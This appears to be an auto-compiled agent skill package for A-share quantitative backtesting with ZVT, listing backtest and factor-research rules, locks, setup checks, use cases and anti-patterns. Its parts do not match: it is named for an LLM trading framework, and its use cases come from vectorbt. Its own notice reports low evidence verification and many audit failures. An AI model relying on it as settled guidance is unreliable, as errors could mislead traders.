- **`SHARED-BT-SURV-004`** <sub>(high)</sub>: 异常值（Extreme Value）污染：原始市场数据可能含有数据源错误（如除权未 及时调整、手工录入错误导致的极端价格），不清洗直接进入因子计算会产生 极端信号，污染整个横截面。应在 pipeline 入口处过滤 3-sigma 异常值。
- **`SHARED-BT-COST-001`** <sub>(fatal)</sub>: 交易成本（佣金 + 印花税/转让税 + 过户费）必须在回测初始化时强制配置， 不可使用零成本默认值。忽略成本的回测策略绩效指标具有欺骗性， 高换手率策略尤其严重（单边往返成本往往吞噬 50%+ 的毛收益）。
- **`SHARED-BT-COST-002`** <sub>(high)</sub>: 滑点（Slippage）建模：回测若无滑点，假设每笔订单以理想价格成交， 高频策略在实盘中会因成交价劣化而产生严重亏损。至少应配置固定点差 或比例滑点；大单应使用成交量比例模型（如不超过日成交量 5%）。
- **`SHARED-BT-COST-003`** <sub>(high)</sub>: 换手率（Turnover）必须在回测绩效报告中展示并与成本关联分析。 月换手率超过 50%（年化 600%+）时，策略净收益对成本假设极度敏感， 每 10bps 成本变化可能改变策略盈亏结论，必须做成本敏感性分析。
- **`SHARED-BT-COST-004`** <sub>(medium)</sub>: 仓位规模化（Position Sizing）必须纳入资金量约束：回测应模拟固定资金量 下的实际持仓股数（取整），而非假设可以持有小数股。 对小盘股，最小交易单位（A股：100股/手）会导致实际可持仓量与目标权重 产生偏差，应在回测中模拟取整效应。
- **`SHARED-BT-TIME-001`** <sub>(high)</sub>: 时间戳时区统一：多数据源合并时，UTC vs 本地时间混用是常见数据腐败源。 所有时间戳必须在 pipeline 入口处统一转换为同一时区（推荐 UTC 存储， 市场本地时区展示），不可在 pipeline 中途混用不同时区。
- **`SHARED-BT-TIME-002`** <sub>(high)</sub>: 交易日历对齐：合并不同市场或不同频率数据时（如日线价格 + 周频因子）， 必须使用明确的交易日历进行 reindex/merge，不可使用 outer join 后 fillna， 否则会在非交易日（节假日）创建虚假数据行。
- **`SHARED-BT-TIME-003`** <sub>(high)</sub>: 增量更新边界校验：历史数据增量更新时，必须从数据库查询已存最新日期， 仅下载该日期之后的数据。若重新下载已有数据并追加，会产生时间戳重复行， 导致回测时序错误。更新前后必须校验无重复 (index.duplicated().any() == False)。
- **`SHARED-BT-TIME-004`** <sub>(medium)</sub>: 回测绩效归因失真：基准（Benchmark）选择不当会使 Alpha/Beta 计算失真。 应选用策略实际可投资的被动基准（如 HS300 ETF），而非不可直接投资的 价格指数（如 HS300 指数）。价格指数不含股息再投资，会低估持仓基准收益。
- **`SHARED-BT-PERF-001`** <sub>(medium)</sub>: 最大回撤（Max Drawdown）计算必须使用净值序列（portfolio value）， 不可用累计收益率序列代替。若使用对数收益率累加，会低估回撤深度 （因对数收益率在下跌时会比简单收益率偏小）。
- **`SHARED-BT-PERF-002`** <sub>(medium)</sub>: Sharpe Ratio 年化化约定：年化 Sharpe = 日 Sharpe × sqrt(252)（股票，252 交易日） 或 × sqrt(365)（加密货币，365日）。不同系统默认不同，跨系统对比前必须 确认年化因子，否则 Sharpe 不可比。
- **`SHARED-BT-PERF-003`** <sub>(medium)</sub>: Calmar Ratio / Sortino Ratio 优于 Sharpe Ratio 作为风险调整收益指标： Sharpe 假设收益正态分布，A 股/加密市场的收益分布显著左偏（肥尾）， 会低估下行风险。量化评估应同时报告 Sortino（仅下行波动）和 Calmar（年化收益/最大回撤），不应单一依赖 Sharpe。
- **`SHARED-BT-PERF-004`** <sub>(medium)</sub>: 回测绩效归因应拆解为：alpha（主动收益）、beta（市场收益）、 因子暴露收益（style/sector）和特异性收益（stock selection）。 不做归因的回测无法区分"策略优秀"与"顺风行情恰好 beta 对了"。
- **`SHARED-FR-IC-001`** <sub>(high)</sub>: IC（信息系数）是衡量因子预测能力的核心指标，定义为因子值与 下期收益率的 Spearman 秩相关系数（ICIR = IC / std(IC)）。 IC 绝对值 > 0.05 视为有预测能力的初步证据，ICIR > 0.5 视为稳定。 不计算 IC 直接报告回测绩效是因子有效性证明缺失的典型问题。
- **`SHARED-FR-IC-002`** <sub>(high)</sub>: IC 衰减（IC Decay）分析：因子预测能力通常随持仓期增长而衰减。 应计算 1/5/10/20 日 IC 序列，识别因子的最优持仓期。 IC 在1日高但20日迅速衰减的因子是短期因子，不适合月度换仓策略； 反之亦然。使用错误的持仓期会严重损害因子实盘表现。
- **`SHARED-FR-IC-003`** <sub>(high)</sub>: Harvey, Liu & Zhu (2016) 警告：学术界已发现 300+ 个"显著"因子， 其中大量是多重检验下的误发现（False Discovery）。因子有效性要求： t-stat > 3.0（而非传统的 1.96）；或在不同时段/市场独立复现； 或有清晰的经济学逻辑。不满足上述条件的因子极可能是数据挖掘产物。
- **`SHARED-FR-IC-004`** <sub>(high)</sub>: 因子换手率（Factor Turnover）控制：高 IC 但高换手率的因子，在扣除 交易成本后净 IC 可能为负。应计算换手率调整后的有效 IC： net_IC = IC - turnover × cost_per_turn。目标换手率 ≤ 50%（月频）。
- **`SHARED-FR-IC-005`** <sub>(medium)</sub>: 因子衰减期（Half-life）是因子信号强度的核心参数，直接决定最优再平衡频率。 半衰期 < 5 日：日频或周频换仓；5-20 日：周频或双周；> 20 日：月频换仓。 错误地对短期因子使用月频换仓，会导致大量 alpha 在持仓期内消散。
- **`SHARED-FR-NEUT-001`** <sub>(high)</sub>: 行业中性化（Industry Neutralization）：因子值若不对行业均值中性化， 因子收益中会混入行业轮动收益，难以判断是因子本身还是行业暴露驱动了收益。 行业中性化操作：factor_neutral = factor - industry_mean(factor)。
- **`SHARED-FR-NEUT-002`** <sub>(high)</sub>: 市值中性化（Market Cap Neutralization）：小盘股效应（小盘跑赢大盘） 是金融史上最持久的 anomaly 之一，会污染几乎所有未中性化的因子。 若因子与市值高度相关，选股会系统性偏向小盘，收益来自市值暴露而非因子本身。 需同时进行行业和市值中性化（Fama-MacBeth 回归或残差法）。
- **`SHARED-FR-NEUT-003`** <sub>(high)</sub>: 异常值处理（Winsorize/MAD）：因子原始值通常含有极端值，极端值会扭曲 分组分析（如 Q1/Q10 十分位）。应对原始因子值做 Winsorize（截尾至 [1%, 99%] 或 3-sigma）或 MAD（中位数绝对偏差）缩尾，然后再排名/中性化。
- **`SHARED-FR-NEUT-004`** <sub>(medium)</sub>: 因子正交化（Factor Orthogonalization）：当多个因子共同用于合成打分时， 高相关因子的合成等效于对单一因子过度权重，稀释信号多样性。 应在合成前对因子做施密特正交化或 PCA，消除因子间的多重共线性。
- **`SHARED-FR-NEUT-005`** <sub>(medium)</sub>: 缺失数据填充策略：因子计算中的 NaN（停牌/新股/数据缺口）若用截面均值填充 会引入 lookahead bias（均值本身含未来信息）；若完全删除会产生幸存者偏差； 正确做法是用截面中位数（当日所有股票的中位数，不依赖未来）或将该股当日排除。
- **`SHARED-FR-PORT-001`** <sub>(high)</sub>: 分层分析（Quantile Analysis）：因子评估应使用 Q1/Q5（五分位）或 Q1/Q10（十分位）分组的多空收益差（top minus bottom spread）作为 主要评估指标，而非简单的多头收益。Q1 多 Q5 空的"单调性"检验是 因子有效性的核心证据：单调递增/递减 > 非单调 >> 仅多头有效。
- **`SHARED-FR-PORT-002`** <sub>(medium)</sub>: Alpha 衰减测试（Alpha Decay Test）：因子的月度 IC 在不同时段（牛市/熊市/ 震荡市）的稳定性是因子鲁棒性的重要证据。IC 仅在某个特定市场状态下有效 的因子不适合全天候部署；应分段（rolling 12M）展示 IC 时序， 识别因子失效期。
- **`SHARED-FR-PORT-003`** <sub>(medium)</sub>: 换仓成本感知（Turnover-Aware Selection）：因子排名靠近中间地带（49-51 分位） 的股票，排名小幅波动就会触发换仓，产生大量无效交易成本。 应在选股时设置换仓缓冲区（buffer zone）：只在排名变化超过阈值时才换仓。
- **`SHARED-FR-PORT-004`** <sub>(medium)</sub>: 分组收益的统计显著性（Bootstrap 检验）：因子分层收益差（Q1-Q5 spread） 即使在历史数据上很大，也可能是偶然，需要 bootstrap 或 t-test 检验 显著性（p-value < 0.05）。小样本回测期（< 3年）的分层收益尤其不可靠。
- **`SHARED-FR-XFER-001`** <sub>(high)</sub>: 因子跨市场可移植性验证：在一个市场有效的因子，不必然在另一个市场有效。 将美股因子直接套用 A 股、或将股票因子套用期货/加密货币，需要独立 IC 验证， 不可假设跨市场通用性。A 股特有异象（如反转效应、ST 价格异常）不存在于美股。
- **`SHARED-FR-XFER-002`** <sub>(medium)</sub>: 因子有效性时间稳定性：曾经有效的因子会因市场学习和套利行为逐渐失效 （McLean & Pontiff 2016 证明因子发表后平均衰减 58%）。 应定期（每季度/年）重新评估因子 IC，失效因子应及时替换或降权。
- **`SHARED-FR-XFER-003`** <sub>(medium)</sub>: 因子与宏观经济环境的交互：利率周期/经济周期/市场情绪对因子有效性影响显著。 价值因子（低 P/B）在利率上升期更有效；动量因子在趋势市更有效，震荡市失效。 部署因子前应评估当前宏观环境与因子最优生存环境的匹配度。

FILE:references/LOCKS.md
# Semantic Locks + Preconditions

## Semantic Locks (12)

### `SL-01` <sub>(on_violation: fatal)</sub>
Execute sell orders before buy orders in every trading cycle

### `SL-02` <sub>(on_violation: fatal)</sub>
Trading signals MUST use next-bar execution (no look-ahead)

### `SL-03` <sub>(on_violation: fatal)</sub>
Entity IDs MUST follow format entity_type_exchange_code

### `SL-04` <sub>(on_violation: fatal)</sub>
DataFrame index MUST be MultiIndex (entity_id, timestamp)

### `SL-05` <sub>(on_violation: fatal)</sub>
TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount

### `SL-06` <sub>(on_violation: fatal)</sub>
filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION

### `SL-07` <sub>(on_violation: fatal)</sub>
Transformer MUST run BEFORE Accumulator in factor pipeline

### `SL-08` <sub>(on_violation: fatal)</sub>
MACD parameters locked: fast=12, slow=26, signal=9

### `SL-09` <sub>(on_violation: warning)</sub>
Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001

### `SL-10` <sub>(on_violation: fatal)</sub>
A-share equity trading is T+1 (no same-day close of buy positions)

### `SL-11` <sub>(on_violation: fatal)</sub>
Recorder subclass MUST define provider AND data_schema class attributes

### `SL-12` <sub>(on_violation: fatal)</sub>
Factor result_df MUST contain either 'filter_result' OR 'score_result' column

## Preconditions (4)

- **`PC-01`**: `python3 -c 'import zvt; print(zvt.__version__)'` → on_fail: Run: python3 -m pip install zvt then re-run: python3 -m zvt.init_dirs to initialize data directories
- **`PC-02`**: `python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1); assert df is not None and len(df) > 0, 'No kdata found'"` → on_fail: Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000 (replace with your target entity IDs)
- **`PC-03`**: `python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); assert zvt_home.exists(), f'ZVT home not found: {zvt_home}'"` → on_fail: Run: python3 -m zvt.init_dirs
- **`PC-04`**: `python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"` → on_fail: Check directory permissions: chmod u+w ~/.zvt or set ZVT_HOME environment variable to a writable location

FILE:references/USE_CASES.md
# Known Use Cases (KUC)

Total: **23**

## `KUC-101`
**Source**: `docs/generate_api.py`

Automatically generate API documentation in Markdown format from Python source code to maintain consistent and up-to-date documentation.

## `KUC-102`
**Source**: `docs/update_api_nav.py`

Automatically update the navigation structure in mkdocs.yml based on the actual API documentation files present in the docs directory.

## `KUC-103`
**Source**: `examples/BitcoinDMAC.ipynb`

Execute a daily MACD (Moving Average Convergence Divergence) crossover strategy on Bitcoin to identify buy and sell signals based on momentum.

## `KUC-104`
**Source**: `examples/MACDVolume.ipynb`

Test multiple MACD parameter combinations (fast/slow windows, signal periods) using 3D volume visualization to find optimal momentum indicator settings.

## `KUC-105`
**Source**: `examples/PairsTrading.ipynb`

Implement statistical arbitrage using pairs trading between correlated assets (PEP/KO) based on cointegration and mean reversion principles.

## `KUC-106`
**Source**: `examples/PortfolioOptimization.ipynb`

Optimize portfolio allocation across multiple assets using Modern Portfolio Theory and the Efficient Frontier to maximize risk-adjusted returns.

## `KUC-107`
**Source**: `examples/PortingBTStrategy.ipynb`

Migrate an existing Backtrader trading strategy (RSI-based with moving averages) to vectorbt for faster backtesting and vectorized operations.

## `KUC-108`
**Source**: `examples/StopSignals.ipynb`

Analyze and compare different exit strategies including stop-loss (SL), trailing stop (TS), take-profit (TP), and random exits across multiple crypto assets.

## `KUC-109`
**Source**: `examples/TelegramSignals.ipynb`

Monitor real-time cryptocurrency prices using Bollinger Bands and send trading signals via Telegram when price crosses indicator bands.

## `KUC-110`
**Source**: `examples/TradingSessions.ipynb`

Filter and segment price data by trading sessions (e.g., market hours) to analyze intraday patterns and run strategies on session-specific data.

## `KUC-111`
**Source**: `examples/WalkForwardOptimization.ipynb`

Perform walk-forward analysis to validate trading strategy robustness by testing parameter optimization on rolling in-sample windows against out-of-sample performance.

## `KUC-112`
**Source**: `tests/notebooks/base.ipynb`

Test and validate base data structure operations including column grouping, array wrapping, indexing, reshaping, and combining functions.

## `KUC-113`
**Source**: `tests/notebooks/generic.ipynb`

Test generic data operations like fillna, frequency handling, and time series utilities across various data shapes and configurations.

## `KUC-114`
**Source**: `tests/notebooks/indicators.ipynb`

Test technical indicator implementations including MACD, Bollinger Bands, RSI, and other TA-Lib/ta-based indicators for correctness and performance.

## `KUC-115`
**Source**: `tests/notebooks/labels.ipynb`

Test labeling functions like FMEAN, FSTD, FMIN, FMAX for computing rolling/floating window statistics on financial time series.

## `KUC-116`
**Source**: `tests/notebooks/ohlcv.ipynb`

Test OHLCV (Open-High-Low-Close-Volume) data handling including column naming conventions and plotting functionality for candlestick data.

## `KUC-117`
**Source**: `tests/notebooks/plotting.ipynb`

Test visualization components including gauges, bar plots, scatter plots, and interactive figure updates for financial data visualization.

## `KUC-118`
**Source**: `tests/notebooks/portfolio.ipynb`

Test portfolio simulation functionality including order processing, position sizing, cash management, and performance metrics calculation.

## `KUC-119`
**Source**: `tests/notebooks/records.ipynb`

Test records data structure for storing and manipulating array-based records with custom field types and grouping capabilities.

## `KUC-120`
**Source**: `tests/notebooks/returns.ipynb`

Test returns calculation functionality including percentage changes, annualization, and integration with empyrical for performance metrics.

## `KUC-121`
**Source**: `tests/notebooks/shortcash.ipynb`

Test short selling mechanics and cash value tracking in portfolio simulation including leverage and margin calculations.

## `KUC-122`
**Source**: `tests/notebooks/signals.ipynb`

Test signal generation and manipulation functions including entries, exits, and boolean signal operations for trading strategies.

## `KUC-123`
**Source**: `tests/notebooks/utils.ipynb`

Test utility functions for configuration, checks, decorators, and attributes used throughout the vectorbt framework.

FILE:references/WISDOM.md
# Cross-Project Wisdom

Total: **10**

## `CW-BT-001` — Cerebro 统一编排引擎
**From**: backtrader · **Applicable to**: backtesting

backtrader 用 Cerebro 作为单一入口，统一管理 data feeds、strategies、analyzers、 observers 的生命周期，支持一次 cerebro.run() 跑多策略+多数据源。 zvt 的 StockTrader 目前每次实例化只绑定一套因子，缺乏统一的多策略组合编排层； 借鉴 Cerebro 模式可让用户把多个 Trader 实例组合到一个 runner 中对比评估。

## `CW-BT-002` — Analyzer 插件化绩效评估
**From**: backtrader · **Applicable to**: backtesting

backtrader 提供 SharpeRatio、DrawDown、TimeReturn、TradeAnalyzer 等即插即用 的 Analyzer，可在不修改策略代码的情况下附加任意绩效指标。 zvt 当前绩效评估能力较弱，没有标准化的 Analyzer 接口； 借鉴此模式可让用户 cerebro.addanalyzer(SharpeRatio) 即得风险调整收益报告。

## `CW-BT-003` — Sizer 仓位管理分离
**From**: backtrader · **Applicable to**: backtesting

backtrader 将仓位管理（每次开仓买多少股/多大比例）单独抽象为 Sizer， 与信号逻辑完全解耦；内置 FixedSize、PercentSizer 等，用户可自定义。 zvt 目前没有显式的 Sizer 概念，仓位控制逻辑散落在 Trader.on_profit_control 等钩子中； 引入 Sizer 接口可使策略信号与资金管理规则独立演化和组合复用。

## `CW-BT-004` — Order 类型全集（Limit/Stop/OCO/Bracket）
**From**: backtrader · **Applicable to**: backtesting

backtrader 支持 Market、Limit、Stop、StopLimit、OCO（二选一）、 Bracket（止盈止损一对订单）等丰富订单类型，并模拟成交滑点和手续费方案。 zvt 回测目前主要支持市价成交，缺乏限价委托和组合订单模拟； 对于高频或实盘对接场景，完善订单类型将大幅提升回测真实性。

## `CW-BT-005` — 数据重采样与重播（Resampling & Replaying）
**From**: backtrader · **Applicable to**: backtesting

backtrader 可将低级别数据（如 1 min）实时 resample 为高级别（如 1 day）并同步驱动策略， 或 replay 逐 tick 模拟 OHLC 形成过程，实现日内精细回测。 zvt 目前多时间框架通过预录入不同级别 K 线实现，缺少运行时动态重采样； 借鉴此模式可在不重复录入数据的前提下支持任意时间粒度组合回测。

## `CW-VN-003` — CTA 回测引擎内置可视化
**From**: vnpy · **Applicable to**: backtesting

vnpy 的 cta_backtester 提供图形界面直接展示策略净值曲线、最大回撤、 每日盈亏、成交明细，无需 Jupyter Notebook。 zvt 目前回测结果可视化依赖 draw_result 方法调用 Plotly，但无统一的回测报告页面； 借鉴此模式可打包一个开箱即用的策略绩效仪表盘。

## `CW-VN-004` — vnpy.alpha ML 因子研究实验室（Lab）
**From**: vnpy · **Applicable to**: factor-research

vnpy 4.0 的 vnpy.alpha.lab 提供数据管理、模型训练、信号生成、策略回测一体化工作流， 支持 Lasso/LightGBM/MLP 等算法的标准化训练接口和可视化对比。 zvt 的 ML 能力目前仅有 MaStockMLMachine 一个入口，缺乏规范化 Lab 框架； 借鉴 Lab 模式可建立"特征工程→训练→信号→回测"的标准流水线，降低 ML 实验门槛。

## `CW-QL-001` — Point-in-Time 数据库（防未来数据泄漏）
**From**: qlib · **Applicable to**: backtesting

qlib 的 Point-in-Time Provider 保证在给定时间点 t 的查询只返回 t 时刻 真实可知的数据（财报发布延迟、修订历史均被正确处理）， 彻底消除回测中的 look-ahead bias。 zvt 目前财务数据以报告期为 timestamp，缺少"发布日"维度， 存在用未来财报数据做选股的潜在偏差；引入 PIT 模式可大幅提升回测可信度。

## `CW-QL-002` — Recorder + Experiment 实验管理（MLflow 风格）
**From**: qlib · **Applicable to**: factor-research

qlib 的 workflow 模块提供 Experiment/Recorder，自动记录每次模型训练的 超参数、特征、指标、预测结果，支持跨实验比较和模型版本管理。 zvt 目前缺乏 ML 实验追踪机制，每次重跑结果会覆盖前次； 借鉴 Recorder 模式可将每次因子实验的参数和结果持久化，支持快速复现和版本对比。

## `CW-QL-003` — Nested Decision Framework（多层嵌套决策执行）
**From**: qlib · **Applicable to**: backtesting

qlib 支持将高频执行层（分钟级委托拆单）嵌套在低频决策层（日级组合调仓）中， 两层独立优化且可组合运行，实现日内最优执行算法（如 TWAP、VWAP 调仓）。 zvt 目前回测仅有日线级别的成交假设，缺乏执行算法建模； 借鉴嵌套框架可让 zvt 区分"何时持有哪些股"与"如何以最小冲击成本建仓"两个问题。

FILE:references/components/data_ingestion.md
# data_ingestion (5 classes)

## `Data.download`
`data_ingestion/data-download.py:0`

## `YFData.download_symbol`
`data_ingestion/yfdata-download-symbol.py:0`

## `BinanceData.download_symbol`
`data_ingestion/binancedata-download-symbol.py:0`

## `Data.concat`
`data_ingestion/data-concat.py:0`

## `download_symbol`
`data_ingestion/download-symbol.py:0`

FILE:references/components/performance_metrics_and_returns.md
# performance_metrics_and_returns (5 classes)

## `ReturnsAccessor.sharpe_ratio`
`performance_metrics_and_returns/returnsaccessor-sharpe-ratio.py:0`

## `ReturnsAccessor.sortino_ratio`
`performance_metrics_and_returns/returnsaccessor-sortino-ratio.py:0`

## `ReturnsAccessor.rolling_sharpe_ratio`
`performance_metrics_and_returns/returnsaccessor-rolling-sharpe-ratio.py:0`

## `QSAdapter`
`performance_metrics_and_returns/qsadapter.py:0`

## `benchmark_rets`
`performance_metrics_and_returns/benchmark-rets.py:0`

FILE:references/components/portfolio_simulation.md
# portfolio_simulation (6 classes)

## `Portfolio.from_orders`
`portfolio_simulation/portfolio-from-orders.py:0`

## `Portfolio.from_signals`
`portfolio_simulation/portfolio-from-signals.py:0`

## `simulate_nb`
`portfolio_simulation/simulate-nb.py:0`

## `order_func_nb`
`portfolio_simulation/order-func-nb.py:0`

## `signal_func_nb`
`portfolio_simulation/signal-func-nb.py:0`

## `cash_sharing`
`portfolio_simulation/cash-sharing.py:0`

FILE:references/components/records_and_event_analysis.md
# records_and_event_analysis (5 classes)

## `Records.map`
`records_and_event_analysis/records-map.py:0`

## `Records.reduce`
`records_and_event_analysis/records-reduce.py:0`

## `Trades.stats`
`records_and_event_analysis/trades-stats.py:0`

## `Drawdowns.stats`
`records_and_event_analysis/drawdowns-stats.py:0`

## `field_config`
`records_and_event_analysis/field-config.py:0`

FILE:references/components/signal_generation.md
# signal_generation (4 classes)

## `generate_enex_nb`
`signal_generation/generate-enex-nb.py:0`

## `generate_stop_enex_nb`
`signal_generation/generate-stop-enex-nb.py:0`

## `bshift`
`signal_generation/bshift.py:0`

## `choice_func_nb`
`signal_generation/choice-func-nb.py:0`

FILE:references/components/statistics_and_plotting.md
# statistics_and_plotting (4 classes)

## `StatsBuilderMixin.stats`
`statistics_and_plotting/statsbuildermixin-stats.py:0`

## `PlotsBuilderMixin.plot`
`statistics_and_plotting/plotsbuildermixin-plot.py:0`

## `PlotsBuilderMixin.subplots`
`statistics_and_plotting/plotsbuildermixin-subplots.py:0`

## `stats_defaults`
`statistics_and_plotting/stats-defaults.py:0`

FILE:references/components/technical_indicators.md
# technical_indicators (5 classes)

## `IndicatorFactory.from_custom_func`
`technical_indicators/indicatorfactory-from-custom-func.py:0`

## `IndicatorBase.run`
`technical_indicators/indicatorbase-run.py:0`

## `IndicatorFactory.from_talib`
`technical_indicators/indicatorfactory-from-talib.py:0`

## `custom_func`
`technical_indicators/custom-func.py:0`

## `param_product`
`technical_indicators/param-product.py:0`

ClawHub Data Analysis Research+2

T@clawhub-tangweigang-jpg-8679fec286

Trading Agents Cn

Skill

基于 LLM 的 A 股多智能体交易分析框架，支持批量选股对比、回测信号生成和因子研究，自带 OpenAI 兼容 API 适配器模板。

---
name: trading-agents-cn
description: |-
  基于 LLM 的 A 股多智能体交易分析框架，支持批量选股对比、回测信号生成和因子研究，自带 OpenAI 兼容 API 适配器模板。
license: Proprietary. See LICENSE.txt in project root.
compatibility: Designed for Doramagic-host ecosystem (Claude Code / openclaw / Cursor). Requires Python 3.12+ with uv package manager.
metadata:
  version: "v6.1"
  blueprint_id: "finance-bp-099"
  compiled_at: "2026-04-22T13:00:44.877519+00:00"
  capability_markets: "cn-astock"
  capability_activities: "backtesting, factor-research"
  sop_version: "crystal-compilation-v6.1"
---
# A 股多智能体 (trading-agents-cn)

> 基于 LLM 的 A 股多智能体交易分析框架，支持批量选股对比、回测信号生成和因子研究，自带 OpenAI 兼容 API 适配器模板。

## Pipeline

`data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization`

## Top Use Cases (29 total)

### LLM Adapter Template for OpenAI-Compatible Providers (`UC-101`)
Users need a template to create custom LLM adapters for OpenAI-compatible API providers to integrate with TradingAgents framework
**Triggers**: llm adapter, openai compatible, custom provider

### Batch Stock Analysis with Comparison Reports (`UC-102`)
Investors need to analyze multiple stocks simultaneously and generate comparison reports for portfolio selection and sector analysis
**Triggers**: batch analysis, multiple stocks, comparison report

### Custom Stock Analysis with Focus Selection (`UC-108`)
Investors need customized stock analysis with selectable focus areas like technical, fundamental, risk assessment, or sector comparison
**Triggers**: custom analysis, analysis focus, personalized

For all **29** use cases, see [references/USE_CASES.md](references/USE_CASES.md).

**Execute trigger**: `When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)`

## What I'll Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Semantic Locks (Fatal)

| ID | Rule | On Violation |
|---|---|---|
| `SL-01` | Execute sell orders before buy orders in every trading cycle | halt |
| `SL-02` | Trading signals MUST use next-bar execution (no look-ahead) | halt |
| `SL-03` | Entity IDs MUST follow format entity_type_exchange_code | halt |
| `SL-04` | DataFrame index MUST be MultiIndex (entity_id, timestamp) | halt |
| `SL-05` | TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount | halt |
| `SL-06` | filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION | halt |
| `SL-07` | Transformer MUST run BEFORE Accumulator in factor pipeline | halt |
| `SL-08` | MACD parameters locked: fast=12, slow=26, signal=9 | halt |

Full lock definitions: [references/LOCKS.md](references/LOCKS.md)

## Top Anti-Patterns (25 total)

- **`AP-ZVT-183`**: 除权因子为 inf/NaN 时直接参与乘法导致复权静默失败
- **`AP-ZVT-179`**: 第三方数据接口超限后异常被吞噬，数据静默缺失
- **`AP-ZVT-183B`**: HFQ（后复权）与 QFQ（前复权）K 线表使用错误导致因子计算漂移

All 25 anti-patterns: [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md)

## Evidence Quality Notice

> [QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-099. Evidence verify ratio = 32.5% and audit fail total = 33. Generated results may have uncaptured requirement gaps. Verify critical decisions against source files (LATEST.yaml / LATEST.jsonl).

## Reference Files

| File | Contents | When to Load |
|---|---|---|
| [references/seed.yaml](references/seed.yaml) | V6+ 全量权威 (source-of-truth) | 有行为/决策争议时必读 |
| [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md) | 25 条跨项目反模式 | 开始实现前 |
| [references/WISDOM.md](references/WISDOM.md) | 跨项目精华借鉴 | 架构决策时 |
| [references/CONSTRAINTS.md](references/CONSTRAINTS.md) | domain + fatal 约束 | 规则冲突时 |
| [references/USE_CASES.md](references/USE_CASES.md) | 全量 KUC-* 业务场景 | 需要完整示例时 |
| [references/LOCKS.md](references/LOCKS.md) | SL-* + preconditions + hints | 生成回测/交易代码前 |
| [references/COMPONENTS.md](references/COMPONENTS.md) | AST 组件地图（按 module 拆分）| 查 API 时 |

---

*Compiled by Doramagic crystal-compilation-v6.1 from `finance-bp-099` blueprint at 2026-04-22T13:00:44.877519+00:00.*
*See [human_summary.md](human_summary.md) for non-technical overview.*

FILE:human_summary.md
# Human Summary

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- **tagline**: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)
- **use_cases**: ['CLI Tool Chinese Localization Demo', 'Batch Stock Analysis with Comparison Reports', 'LLM Adapter Template for OpenAI-Compatible Providers', 'A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney', 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader', 'Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout', 'Index composition data collection (SZ1000, SZ2000) with EM recorder']

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

FILE:references/ANTI_PATTERNS.md
# Anti-Patterns (Cross-Project)

Total: **25**

## qlib (9)

### `AP-QLIB-1930` — 回测结果与模型无关——共享 dataset 对象导致预测值被首次模型覆盖 <sub>(high)</sub>

Qlib 中多个模型复用同一个已 fit 的 DatasetH 实例时，dataset 内部的标准化 参数（fit_start_time/fit_end_time 决定的归一化统计量）在第一次 fit 后固化。 切换模型但不重新初始化 dataset，导致所有模型实际使用同一套预测信号。表现为 无论换 LightGBM/XGBoost/DNN，回测净值曲线完全一致。这是最危险的"实验看起来 在跑，但结论全部无效"反模式。

Source: https://github.com/microsoft/qlib/issues/1930

### `AP-QLIB-2090` — fit_start_time 与 train segment 双重配置引发隐式数据泄露 <sub>(high)</sub>

Qlib DatasetH 有两个"训练数据范围"：handler 的 fit_start_time/fit_end_time （决定归一化器拟合范围）和 segments.train（决定模型训练范围）。常见错误是 让 fit_end_time 覆盖 valid/test 段，使归一化统计量（均值、标准差）包含了 未来数据，造成前向偏差（look-ahead bias）。两者独立配置但语义耦合，文档 未明确说明 fit_end_time 必须 <= train_end。

Source: https://github.com/microsoft/qlib/issues/2090

### `AP-QLIB-2036` — MACD 因子公式文档错误——DEA 被多除一次 CLOSE 导致量纲不一致 <sub>(high)</sub>

Qlib 官方文档中的 Alpha 公式示例将 MACD 的 DEA 定义为 EMA(DIF, 9) / CLOSE， 但 DIF 已经是无量纲（除过 CLOSE 的），再次除以 CLOSE 导致 DEA 量纲为 1/price。 基于此文档公式构建的 MACD 因子在截面标准化后与正确公式差异显著，IC 下降。 此类文档层面的公式错误会被大量用户直接照搬入生产因子库。

Source: https://github.com/microsoft/qlib/issues/2036

